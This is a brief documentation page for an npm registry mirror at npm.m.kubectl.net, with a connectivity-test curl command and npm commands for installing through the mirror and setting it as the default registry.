Skip to content

NPM Registry Mirror

Access a fast and reliable mirror of the official npm registry through the unified npm.m.kubectl.net endpoint.
This mirror improves package installation speed and stability, especially in restricted or high-latency environments.


Access control

This service requires network-level access authorization.

Test your connectivity:

curl -s https://npm.m.kubectl.net/-/access/test

Expected responses:

  • Access Allowed
  • Access Denied

For support or inquiries: dev@intellij.io


Mirror endpoint

Mirror URL Source Description
https://npm.m.kubectl.net https://registry.npmjs.org npmjs mirror

Fully compatible with all npm and yarn package operations.


Usage

Install packages through the mirror

npm install -g pm2 --registry=https://npm.m.kubectl.net

Make the mirror your default npm registry

npm config set registry https://npm.m.kubectl.net

Check the current registry

npm config get registry

The mirror works as a drop-in replacement and requires no additional configuration.